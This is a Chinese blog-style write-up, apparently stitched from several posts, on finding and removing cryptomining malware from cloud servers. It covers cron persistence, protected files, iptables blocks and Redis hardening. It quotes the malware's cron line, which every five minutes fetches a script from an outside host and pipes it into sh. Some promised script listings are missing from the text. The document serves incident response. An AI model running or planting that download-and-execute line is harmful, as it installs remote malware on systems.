云服务器中挖矿病毒的清除过程（三）

服务器CPU使用率50%，被两个进程占用，名称分别为

-mysql

zfsutils-md5sum

使用crontab -l查看定时任务，发现病毒文件-mysql

查看这个/var/.log/目录，发现更多病毒文件，-mysql是个脚本，内容如下

查看/etc/crontab.daily目录，发现一个文件名为ntpdate

/bin/sysprg创建日期与ntupdate是同一天，文件大小与x86_64相同，无疑也是个病毒文件。

进入到/var/spool/cron目录查看文件权限，发现被加了保护，使用lsattr去除，再编辑删除内容即可

禁用crontab

云服务器中挖矿病毒的清除过程（一）

云服务器中挖矿病毒的清除过程（二）

发现一台服务器，CPU使用率一直50%左右，top查看一进程名称为

-bash，按c查看详情，名称显示为python

十分可疑

杀掉进程，清空crontab内容，并删除此目录文件，发现过一阵进程又被启动起来了

查看/etc/cron.hourly，发现有一个sync文件，还是会定时执行，内容为

此文件还被加了保护权限，需要用chattr去除后删除

cron.daily cron.weekly cron.monthly里面也有

同样方法删除/bin/sysdrr

至此病毒被彻底清除

删除/opt/.new目录时，发现此目录下还有一个/opt/.md目录，内容如下

病毒运行原理是

其他常用的诊断命令

关联文章：

云服务器中挖矿病毒的清除过程

服务器中毒导致的wget等系统命令失效后的恢复

参考文章：

【PC样本分析】记录最近与挖矿病毒的斗智斗勇

【PC样本分析】记录最近与挖矿病毒的斗智斗勇(二)

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top，查看了一会，没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh

病毒文件内容如下，感兴趣的可以研究下：

View Code

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，http://blog.jobbole.com/94518/然后就注入了病毒，下面是解决办法和清除工作：

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.

配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.

配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度

好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf

2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉.

---